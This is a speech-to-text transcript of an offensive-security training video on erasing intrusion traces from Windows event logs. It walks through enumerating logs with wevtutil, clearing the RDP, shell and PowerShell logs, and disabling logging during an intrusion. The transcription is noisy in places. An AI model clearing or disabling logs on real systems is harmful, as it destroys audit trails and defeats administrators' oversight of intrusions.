Hello, viewers. Welcome to this latest video on post exploitation, hacking, persistence and continued access. This video is going to be discussing the third and final step
of post exploitation hacking, which is covering tracks clearing data out clearing any record of your presence.
Ah, this is going to be
this particular video is going to be discussing Windows security logs and how to enumerating them and remove them.
This is discussing sort of the hammer technique or the sledgehammer technique of hiding your presence, which is to essentially just set fire to the security logs.
any vigilant system administrator will notice that all of their security larger gone, and that'll be a warning that someone was there.
But, you know, doesn't tell him you were there. So depending on your situation and how much time you have and how will you are to let them know some sort of event took place?
It's still a pretty valid option,
not to mention windows, especially when the seven has made
deleting specific log entries extremely difficult.
So sometimes deleting everything is the safer course.
So we're gonna go ahead and you were gonna learn about a tool in this called W E B T u till
Windows event utility.
So we see here it enables you to retrieve information about event logs and stalling on it's all above above a rock.
first thing we're gonna do, we're just gonna pretty much run through all of this. All of these options 1st 1 is a new blocks. So
Wow, look at that. Isn't that a bunch of logs?
lots of Microsoft Windows stuff.
Here's one that might be useful
myself. Windows shell,
maybe something we want to examine.
Sticky note. Get lots of junk
Terminal service's. That's definitely when we want to get rid off. Well, not all of them, but certainly
we want to consider getting rid of these already. P
that's a log of things that were, you know, where people who already peed in.
let's check this again
so we can get long configuration information. Okay, let's see what that does.
it needs a specific log.
Well, we've already found one that we're kind of looking at and considering getting rid of. So let's check
All right, So this log is the ah, the rdp Operational log.
publisher is Microsoft Windows.
He's got some access information. It's gotta log file name. Okay,
so if we just want to torch that log, we can try going into this location,
see if it will let us in.
You would appear. Well,
probably get over this last part.
All right, so you see lots of things
again. We see remote connection manager event logs.
I'm not actually going to delete these particular logs simply because
I wanna have around for later demos and later information.
But if you wanted to destroy logs, this is the place you could go. You could do Del Star,
which pretty much torch everything.
or you can do it a little bit more effectively, which is what we're gonna do in a minute. Like I said, I'll show you.
So we've got get log, we set log. We can actually modify a lot of configuration.
We could check publishers we can install blah Boba.
Now, here's a good one. This is what we want.
I want to be able to clear log
also exporting like wouldn't be bad if you wanted to Ah,
do some serious information gathering exporting a bunch of logs is a great way to go. But
it's sort of time consuming and boring.
We are going to clear a log,
So even you till C l.
That's not the one we want it all, is it?
So we go back up here to this
super interesting stuff.
So this is the law. We're gonna go ahead and clear
we're gonna do a C l instead of a geo
and bam. It's cleared
total. See anything interesting here Now? No noticeable changes have been made.
However, when someone goes through with their actual log viewer with an event you were this will now show them absolutely nothing
What would happen if we did this on, say, another log that we may have noticed a moment ago?
first. We'll do it. Get log so we can see what's in it.
There's no owning publisher. It's an administrative log. It is enabled
all of this information, Max sighs.
One thing that's worth doing. If you really wanna mess with an admin, Ted is setting this to disabled
while you're doing your stuff and then sending it to enabled when you leave?
Um, it won't work perfectly. It will record that it was disabled, but it won't record what you did. Which is a big part of you know how you can kind of get away with doing things that you probably shouldn't be doing.
But in our case, we're just kind of doing the basics instead of anything to high level in specific, we're going to go ahead and
So now we have actually gotten rid of that, and we've just emptied it
And now we're fair now. We're feeling pretty safe, you know? They can't actually see us. The logs were gone. They know someone was here. Someone did something, but they don't know it was us. And they don't know what we did.
Windows, event logs, contract anything
you can set up a log extract pretty much anything you could imagine.
So it's useful to Ah, really go through that list. The
and actually go through this and just manually check.
We're not manually, necessarily. We go through this and check for anything that might be what you're after.
Any event log that might have information.
Um, again, I mentioned the shell logs
always worth considering getting rid of him.
And the reason for this is really pretty straightforward. You never know what's actually being stored in them. So we see there are actually some other security
you probably want to clear out.
When in doubt with log. If you've already started clearing logs out,
This power show law was worth getting rid of
That's really all there is for this video. It was a pretty quick, pretty, straightforward pretty simple.
all you really need to know about logs is if you don't have a special tool which can actually break in and change them
better no log me present than along that tells them what you did
with that. We're gonna go ahead and end of the video.
I hope you learned a lot of hope. You, you know,
experience some new things to do with logs and to do with clearing.
And until next time, I'm just me, Joseph Perry. And you've been watching this on cyberia dot i t